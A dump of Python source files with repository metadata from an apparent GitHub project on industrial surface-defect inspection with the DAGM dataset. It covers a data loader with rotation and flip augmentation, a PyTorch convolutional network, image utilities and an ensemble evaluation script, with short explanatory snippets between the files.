x=w-blockW-1\n if y<0:\n y=0\n elif y>=h-blockH:\n y=h-blockH-1\n# print(tempX[y,x])\n cropX = tempX[y:y+blockH, x:x+blockW]\n cropY = tempY[y:y+blockH, x:x+blockW]\n# print(cropX.shape)\n# plt.imshow(cropX, cmap='gray')\n# plt.show()\n# plt.imshow(cropY, cmap='gray')\n# plt.show()\n X += dataAugmentation(cropX/255.)\n if self.label_type=='image':\n Y += dataAugmentation(cropY/255.)\n \n elif self.label_type=='index':\n indexNo = None\n if self.label_size==12:\n indexNo = classNo+5\n elif self.label_size==13:\n indexNo = classNo+6\n \n for k in range(8):\n Y.append(indexNo) \n \n elif self.label_type=='array':\n temp = np.zeros(self.label_size)\n \n if self.label_size==12:\n temp[classNo+5] = 1\n elif self.label_size==13:\n temp[classNo+6] = 1\n \n for k in range(8):\n Y.append(temp)\n \n return X, Y\n \n \n \n ################################################======================================================================\n \n def getFullImages(self, sizeW, sizeH, nOKperClass=50, nNGperClass=50, classNoList=[1,2,3,4,5,6], isTrain=True):\n \n dataX = []\n dataY = []\n \n for classNo in classNoList:\n X = []\n Y = []\n if classNo==1:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC1_OK, self.trainInfoC1_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC1_OK, self.testInfoC1_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==2:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC2_OK, self.trainInfoC2_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC2_OK, self.testInfoC2_NG, sizeW, 
sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==3:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC3_OK, self.trainInfoC3_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC3_OK, self.testInfoC3_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==4:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC4_OK, self.trainInfoC4_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC4_OK, self.testInfoC4_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==5:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC5_OK, self.trainInfoC5_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC5_OK, self.testInfoC5_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n elif classNo==6:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC6_OK, self.trainInfoC6_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC6_OK, self.testInfoC6_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n dataX += X\n dataY += Y\n\n dataX = np.array(dataX, dtype=np.float32)\n dataY = np.array(dataY, dtype=np.float32)\n \n if isTrain:\n self.train.images = dataX\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n\n \n \n def getRequestedClassFullImages(self, classNo, dataInfo_OK, dataInfo_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain ):\n\n X = []\n Y = []\n \n dataFolder = '/Test/'\n labelFolder = '/Test/Label/'\n if isTrain: \n dataFolder = '/Train/'\n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n xDataPath = classPath + dataFolder\n yDataPath = classPath + labelFolder\n \n random_batch = np.random.choice(len(dataInfo_OK), nOKperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_OK[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempX = cv2.resize(tempX, (sizeW, sizeH)) \n# print(imgInfoBuffer)\n# cv2.imshow('ddd', image)\n# cv2.waitKey(0)\n tempY = np.zeros([sizeW, sizeH])\n X.append(tempX/255.)\n Y.append(tempY/255.)\n \n if nNGperClass<8:\n nNGperClass=8 \n numNGperClass = int(nNGperClass/8)\n random_batch = np.random.choice(len(dataInfo_NG), numNGperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_NG[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempX = cv2.resize(tempX, (sizeW, sizeH)) \n# print(imgInfoBuffer)\n# cv2.imshow('ddd', image)\n# cv2.waitKey(0)\n \n Ypath = yDataPath + imgInfoBuffer[5]\n tempY = cv2.imread(Ypath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempY = cv2.resize(tempY, (sizeW, sizeH))\n# cv2.imshow('ddd', labeledImage)\n# cv2.waitKey(0)\n X += dataAugmentation(tempX/255.)\n Y += dataAugmentation(tempY/255.)\n \n return X, Y\n\n\n\n\n \n 
\nif __name__ == '__main__': \n \n\n dataPath = \"../DAGM_dataset\" \n\n \n dagm = DAGM(dataPath) \n dagm.getBlockImages(blockW=256, blockH=256, nOKperClass=1, nNGperClass=1, isTrain=False)\n# dagm.getFullImages( sizeW=300, sizeH=300, nOKperClass=1, nNGperClass=1, isTrain=False)\n# print(dagm.test.images[700])\n \n temp = dagm.test.images[0]\n plt.imshow(temp, cmap='gray')\n plt.show() \n temp = dagm.test.labels[0]\n plt.imshow(temp, cmap='gray')\n plt.show() \n\n# cv2.imshow('ddd', dagm.train.images[0])\n# cv2.waitKey(0)"
},
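dataAugmentation in dagmCV2.py expands every defective crop into 8 variants (4 rotations of the crop plus 4 rotations of its flip), which is why nNGperClass is divided by 8 before the NG images are sampled. A quick standalone sketch that checks the bookkeeping, using the same cv2 calls as the file (the function name is illustrative):

import numpy as np
import cv2

def augment8(img):
    # 4 rotations of the crop and 4 rotations of its flip -> 8 samples
    flipped = cv2.flip(img, 1)
    out = []
    for k in range(1, 5):
        M = cv2.getRotationMatrix2D((img.shape[1]/2, img.shape[0]/2), 90*k, 1)
        out.append(cv2.warpAffine(img, M, (img.shape[1], img.shape[0])))
        out.append(cv2.warpAffine(flipped, M, (img.shape[1], img.shape[0])))
    return out

crop = np.random.rand(32, 32).astype(np.float32)
aug = augment8(crop)
print(len(aug))      # 8 variants per source crop
# so requesting 160 NG blocks per class needs only 160 // 8 source images
print(160 // 8)      # 20 NG images sampled per class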
{
"alpha_fraction": 0.5037208199501038,
"alphanum_fraction": 0.5393892526626587,
"avg_line_length": 29.20930290222168,
"blob_id": "e83e8bd00ba1c91c4f05f7deb135f7e202fe2bf3",
"content_id": "9d97a86aaecfd5f534a707e8cff743d666e43e98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3897,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 129,
"path": "/DAGM/DAGM_CNN_pytorch/networks/cnn1.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\n\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import numpy as np\n#import time\n\nimport torch.nn as nn\nimport math\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\n\n\nclass OneConvBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1):\n super(OneConvBlock, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True) \n self.stride = stride\n \n def forward(self, x):\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n return out\n\nclass ConvNetJK(nn.Module):\n\n def __init__(self, block, layers, k=1, input_size=(1,32,32), num_classes=12):\n self.inplanes = 1\n super(ConvNetJK, self).__init__()\n \n# self.maxPool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, return_indices=True)\n self.maxPool = nn.MaxPool2d(kernel_size=2, stride=2) \n \n self.layer1 = self._make_layer(block, 16*k, layers[0], stride=1)\n self.layer2 = self._make_layer(block, 32*k, layers[1], stride=1)\n self.layer3 = self._make_layer(block, 64*k, layers[2], stride=1)\n self.layer4 = self._make_layer(block, 128*k, layers[3], stride=1)\n \n h = int(input_size[1]/16)\n w = int(input_size[2]/16)\n self.fc1 = nn.Linear(128*k*h*w, 1024, bias=False)\n self.bn1 = nn.BatchNorm2d(1024)\n self.relu = nn.ReLU(inplace=True)\n \n self.fc2 = nn.Linear(1024, num_classes)\n \n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n# for m in self.modules():\n# if isinstance(m, nn.Conv2d):\n# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n# elif isinstance(m, nn.BatchNorm2d):\n# nn.init.constant_(m.weight, 1)\n# nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n\n layers = []\n layers.append(block(self.inplanes, planes, stride))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, isGPU=True): \n \n l1 = self.layer1(x) \n \n pool1 = self.maxPool(l1)\n# print(pool1.size())\n l2 = self.layer2(pool1) \n \n pool2 = self.maxPool(l2)\n# print(pool2.size()) \n l3 = self.layer3(pool2) \n \n pool3 = self.maxPool(l3)\n \n out = self.layer3(pool3) \n \n out = self.maxPool(out)\n# print(pool3.size()) \n out = out.view(out.size(0), -1) \n out = self.fc1(out)\n out = self.bn1(out)\n out = self.relu(out) \n# print(out.size()) \n out = self.fc2(out)\n\n return out\n\ndef Conv12k4(input_size, label_size, **kwargs):\n \"\"\"Constructs a ResNet-18 model.\n \n Args:\n \n \"\"\"\n model = ConvNetJK(OneConvBlock, [2, 3, 4, 3], k=4, input_size=input_size,\n num_classes=label_size, **kwargs) \n return model"
},
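cnn1.py builds each stage with _make_layer, which chains several copies of OneConvBlock into an nn.Sequential while threading the running channel count through self.inplanes. A tiny standalone sketch of that composition idiom plus a shape check; the class and function names here are illustrative, and the shape assumes 3x3 convolutions with padding 1:

import torch
import torch.nn as nn

class ConvBlock(nn.Module):
    def __init__(self, inplanes, planes):
        super(ConvBlock, self).__init__()
        self.body = nn.Sequential(
            nn.Conv2d(inplanes, planes, 3, padding=1, bias=False),
            nn.BatchNorm2d(planes),
            nn.ReLU(inplace=True))
    def forward(self, x):
        return self.body(x)

def make_layer(inplanes, planes, blocks):
    # first block adapts the channel count, the remaining ones keep it
    layers = [ConvBlock(inplanes, planes)]
    layers += [ConvBlock(planes, planes) for _ in range(blocks - 1)]
    return nn.Sequential(*layers)

stage = make_layer(1, 16, 2)
x = torch.randn(4, 1, 32, 32)
print(stage(x).shape)   # torch.Size([4, 16, 32, 32]); spatial size unchanged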
{
"alpha_fraction": 0.5363360047340393,
"alphanum_fraction": 0.5598231554031372,
"avg_line_length": 28.557376861572266,
"blob_id": "d9d55b78a8727e8f4eafadc7fdc80d0edbf9940a",
"content_id": "e80449ddf8596824d4c13f2a772720d6a2969f12",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3651,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 122,
"path": "/DAGM/JK_image.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nUTIL for image processing (v0.1)\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport glob\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\ndef getImagesNumberOrder(path, format='png'): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n import re\n numbers = re.compile(r'(\\d+)')\n def numericalSort(value):\n parts = numbers.split(value)\n parts[1::2] = map(int, parts[1::2])\n return parts\n\n imgList = []\n for filepath in sorted(glob.glob(path + \"/*.\"+format), key=numericalSort): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef getImages(path, format='png'): # input : path # output : imgList \n imgList = []\n for filepath in glob.glob(path + \"/*.\"+format): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef getImages2(path, format='PNG'): # input : path # output : imgList \n imgList = []\n for filepath in glob.glob(path + \"/*.\"+format): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n\n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n\n\ndef HWC2toC2HW(image): \n r = image[:,:,0]\n g = image[:,:,1]\n return np.array([r,g]) \n\ndef C2HWtoHWC2(image): \n tempImg = np.zeros([image.shape[1], image.shape[2], image.shape[0]])\n tempImg[:,:,0] = image[0,:,:]\n tempImg[:,:,1] = image[1,:,:]\n return tempImg \n\ndef HWC3toC3HW(image): \n r, g, b = cv2.split(image)\n# r = image[:,:,0]\n# g = image[:,:,1]\n# b = image[:,:,2]\n return np.array([r,g,b]) \n\ndef HWC4toC3HW(image): \n r, g, b, a = cv2.split(image)\n# r = image[:,:,0]\n# g = image[:,:,1]\n# b = image[:,:,2]\n return np.array([r,g,b]) \n\ndef C3HWtoHWC3(image): \n r = image[0,:,:]\n g = image[1,:,:]\n b = image[2,:,:]\n return cv2.merge((r,g,b))\n\ndef GRAY2HeatMap(image):\n # a colormap and a normalization instance\n cmap = plt.cm.jet\n norm = plt.Normalize(vmin=image.min(), vmax=image.max()) \n heatmap =cmap(norm(image))\n# r, g, b, a = cv2.split(heatmap) \n# return cv2.merge((r,g,b))\n return heatmap\n\n \n "
},
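getImagesNumberOrder relies on a regex-based sort key so that 'img10.png' comes after 'img2.png' instead of before it, as a plain lexicographic sort would order them. The key in isolation, runnable without OpenCV:

import re

numbers = re.compile(r'(\d+)')

def numericalSort(value):
    # split 'img10.png' into ['img', 10, '.png'] so comparisons are numeric
    parts = numbers.split(value)
    parts[1::2] = map(int, parts[1::2])
    return parts

files = ["img10.png", "img2.png", "img1.png"]
print(sorted(files))                     # ['img1.png', 'img10.png', 'img2.png']
print(sorted(files, key=numericalSort))  # ['img1.png', 'img2.png', 'img10.png']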
{
"alpha_fraction": 0.5385835766792297,
"alphanum_fraction": 0.5647553205490112,
"avg_line_length": 32.806968688964844,
"blob_id": "519bf1556f47044a15c5acb1db480fcbd1313375",
"content_id": "33b7fb7d6a0e392dcf6af51992c242394088534f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12609,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 373,
"path": "/DAGM/Run_Ensemble_CNN/dagm_ensemble_evaluation_CNN.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nimport glob\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport math\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n#from pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n#sys.path.insert(0, 'networks')\nsys.path.append(\"networks\") # parent directory\n#sys.path.append(\"../JK\") # parent directory\n#sys.path.append(\"preTrained_models\")\n#sys.path.insert(0, 'networks')\n\n#import util_image\n#sys.path.append(\"../../ML_utils\") # parent directory\nsys.path.append(\"..\")\nimport JK_image \n\ndef resizedResult( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n blockH = blockSize[0]\n blockW = blockSize[1]\n height = outputSize[0]\n width = outputSize[1]\n \n result = np.zeros([height,width]) \n for colNo in range(0, nCols):\n for rowNo in range(0, nRows): \n index = rowNo+colNo*nRows\n classNo = predictions[index] \n if classNo>=6:\n result[blockH*rowNo:blockH*(1+rowNo), blockW*colNo:blockW*(1+colNo)] = 1\n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef resizedResult2( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n blockH = blockSize[0]\n blockW = blockSize[1]\n height = outputSize[0]\n width = outputSize[1]\n \n result = np.zeros([height,width]) \n for colNo in range(0, nCols):\n for rowNo in range(0, nRows): \n index = rowNo+colNo*nRows\n classNo = predictions[index] \n if classNo>=6:\n result[blockH*rowNo:blockH*(1+rowNo), blockW*colNo:blockW*(1+colNo)] = probs[index]\n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef resizedResult3( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n \n result = np.zeros([nRows,nCols]) \n for rowNo in range(nRows):\n for colNo in range(nCols):\n index = colNo+rowNo*nCols\n classNo = predictions[index] \n if classNo>=6:\n result[colNo,rowNo] = probs[index] \n else:\n result[colNo,rowNo] = 1.0-probs[index] \n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch, volatile=True).cuda()\n else :\n array_torch = Variable(array_torch, volatile=True).cpu()\n return array_torch\n\n\n\n\ndef showResults(inputs, results): \n #===== 
vizualize dataset =====# \n nOutput = inputs.shape[0]\n for i in range(nOutput): \n \n X = inputs[i]\n result = results[i]\n \n fig, (ax1, ax2) = plt.subplots(1,2, figsize=(8,4))\n p = ax1.pcolormesh(X) \n p = ax2.pcolormesh(result)\n plt.show()\n# filePath = self.resultFolderPath + 'compared_result%d.png' % i\n# plt.imsave(filePath, buffer)\n \ndef showResultsWithLabels(inputs, labels, results): \n #===== vizualize dataset =====# \n nOutput = inputs.shape[0]\n for i in range(nOutput): \n \n X = inputs[i]\n Y = labels[i]\n result = results[i]\n \n fig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(12,4))\n p = ax1.pcolormesh(X)\n p = ax2.pcolormesh(Y) \n p = ax3.pcolormesh(result)\n plt.show()\n \n \ndef loadModel( path, isGPU):\n \n network = 0 \n try: \n network = torch.load(path, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n print(\"--------\" + path + \" is restored--------\") \n except:\n print(\"--------There are no models.--------\") \n pass\n \n \n if isGPU:\n network.cuda()\n else :\n network.cpu()\n \n return network\n \n\ndef getEnsembleResultCNN(args, Xs, model_li): \n Sigmoid = nn.Sigmoid()\n Softmax = nn.Softmax()\n result_var = 0\n iterNo = 0\n for net in model_li:\n# modelPath = \"preTrained_models/\"+ model[0] + \"/\" + model[1] + '_all.pkl' \n# net = loadModel(modelPath, args.isGPU)\n# net.eval()\n \n output_var = net(Xs)\n output_var = Softmax(output_var)\n net = [] \n if iterNo>0:\n result_var += output_var\n else:\n result_var = output_var\n \n iterNo+=1\n \n result_var /= iterNo \n if args.isGPU:\n result_var = result_var.cpu() \n \n return result_var\n \ndef changeImageToFeature( args, image):\n \n height = image.shape[0]\n width = image.shape[1]\n# print(height, width)\n\n blockC = args.feature_size[0]\n blockH = args.feature_size[1]\n blockW = args.feature_size[2]\n \n \n resultFolderPath = \"./Results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n\n# Xs = np.array(images, dtype=np.float32)/255. 
\n# Xs = Xs.reshape([-1,1,height,width]) \n \n Xs_np = []\n tempX = image/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs_np.append(tempX[i:i+blockW, j:j+blockH]) \n\n Xs_np = np.array(Xs_np, dtype=np.float32).reshape([-1, blockC, blockH, blockW]) \n# Xs_tensor = torch.from_numpy(Xs_np) \n# dataset = TensorDataset(data_tensor=Xs_tensor, target_tensor=Xs_tensor) \n# test_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=False) \n \n\n Xs_var = numpyToTorchVariable(Xs_np, isGPU=args.isGPU)\n \n return Xs_var\n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n print(\"Torch version :\", torch.__version__)\n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n settings1 = dotdict({\n 'dataPath' : \"../../../JKcloud/DB_JK/DAGM_dataset\",\n 'DataForEval' : \"DataForEvaluation\",\n 'isGPU' : True, # False, # True,\n 'isLabel' : True,\n 'load_folder_file': [(\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet34v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n# (\"DAGM2_resnetJK0_resnet50v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet101v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet152v1_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k4_32_12\",'optimal0'),\n (\"DAGM2_cnn0_Conv12k8_32_12\",'recent')], \n 'feature_size' : [1, 32, 32],\n 'batch_size' : 6,\n })\n \n\n# if useGPU==False and FCN_settings.isGPU==True:\n# FCN_settings.isGPU = False\n# print(\"GPU is not availabe.\")\n# \n# if FCN_settings.isGPU==False:\n# print(\"Runing by CPU\")\n \n # load pre-trained models\n model_li = [] \n for model in settings1.load_folder_file:\n modelPath = \"preTrained_models/\"+ model[0] + \"/\" + model[1] + '_all.pkl' \n net = loadModel(modelPath, settings1.isGPU)\n net.eval() \n model_li.append(net) \n \n images = JK_image.getImages2(\"./DataForEvaluation\")\n height = images[0].shape[0]\n width = images[0].shape[1]\n\n blockC = settings1.feature_size[0]\n blockH = settings1.feature_size[1]\n blockW = settings1.feature_size[2]\n \n # Defect inspection by FCN \n results = []\n for image in images:\n \n # (1, 512, 512, 1) to (-1, 1, 32, 32)\n Xs_var = changeImageToFeature(settings1, image) \n \n # get the result by CNN ensenble\n cnn_result = getEnsembleResultCNN(settings1, Xs_var, model_li)\n \n probs, predictions = torch.max(cnn_result, 1)\n # print(probs, predictions)\n probs = probs.data.numpy()\n predictions = predictions.data.numpy() \n \n resized_img = resizedResult3((blockH,blockW), (512,512), probs, predictions)\n \n results.append(resized_img)\n \n results = np.array(results, dtype=\"float\") \n \n\n \n \n #===== Visualize color results ===========================================================================\n import visdom\n vis = visdom.Visdom() \n visualizeTool = \"visdom\" # matplotlib | visdom 
\n visualType = \"heatmap\" # heatmap\n \n if visualType==\"gray\":\n results = np.reshape(results, [-1, 1, height, width])\n vis.images(results, nrow=3)\n \n elif visualType==\"heatmap\":\n \n results = np.reshape(results, [-1, height, width])\n imagesC3 = []\n cnn_resultsC3 = []\n fcn_resultsC3 = []\n for i in range(results.shape[0]):\n # print(results[i].shape)\n if visualizeTool == \"visdom\":\n # imagesC3.append( JK_image.HWC3toC3HW(cv2.cvtColor(images[i], cv2.COLOR_GRAY2RGB) ) ) \n cnn_resultsC3.append( JK_image.HWC4toC3HW(JK_image.GRAY2HeatMap(results[i]) ) )\n # fcn_resultsC3.append( JK_image.HWC4toC3HW(JK_image.GRAY2HeatMap(fcn_results[i]) ) )\n \n elif visualizeTool == \"matplotlib\":\n # imagesC3.append( cv2.cvtColor(images[i], cv2.COLOR_GRAY2RGB) ) \n cnn_resultsC3.append( JK_image.GRAY2HeatMap(results[i]) ) \n # fcn_resultsC3.append( JK_image.GRAY2HeatMap(fcn_results[i]) ) \n \n \n imagesC3 = np.array(imagesC3, dtype='float')\n cnn_resultsC3 = np.array(cnn_resultsC3, dtype='float')\n fcn_resultsC3 = np.array(fcn_resultsC3, dtype='float') \n \n \n if visualizeTool == \"visdom\":\n # result_set1 = np.concatenate( ( np.concatenate((imagesC3[:3], cnn_resultsC3[:3]), axis=0), fcn_resultsC3[:3] ), axis=0) \n # result_set2 = np.concatenate( ( np.concatenate((imagesC3[3:], cnn_resultsC3[3:]), axis=0), fcn_resultsC3[3:]), axis=0) \n # vis.images(result_set1, nrow=3)\n # vis.images(result_set2, nrow=3)\n vis.images(cnn_resultsC3, nrow=3)\n \n elif visualizeTool == \"matplotlib\":\n \n showHeatMap3(imagesC3[:3], cnn_resultsC3[:3], fcn_resultsC3[:3])\n showHeatMap3(imagesC3[3:], cnn_resultsC3[3:], fcn_resultsC3[3:])"
},
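getEnsembleResultCNN averages the softmax outputs of several independently trained classifiers and then takes the per-block argmax. The core of that soft-voting scheme in isolation, with toy linear models standing in for the loaded '<folder>/<name>_all.pkl' checkpoints, written against the modern PyTorch API (torch.softmax, torch.no_grad):

import torch
import torch.nn as nn

# three stand-in "models" over flattened 32x32 blocks with 12 classes
models = [nn.Linear(32*32, 12) for _ in range(3)]
for m in models:
    m.eval()

x = torch.randn(5, 1, 32, 32).view(5, -1)   # 5 blocks, flattened
with torch.no_grad():
    # soft voting: mean of per-model class probabilities
    probs = sum(torch.softmax(m(x), dim=1) for m in models) / len(models)

conf, pred = torch.max(probs, 1)   # per-block confidence and predicted class
print(pred.tolist(), conf.shape)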
{
"alpha_fraction": 0.5571955442428589,
"alphanum_fraction": 0.5833829045295715,
"avg_line_length": 33.90416717529297,
"blob_id": "c41b1fc07cb098f6665d6acfcfb234ca490fedcf",
"content_id": "0f5ff2f03d6f4191142a7e14d3126e40ebbfffd2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8401,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 240,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_evaluation_visdom.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
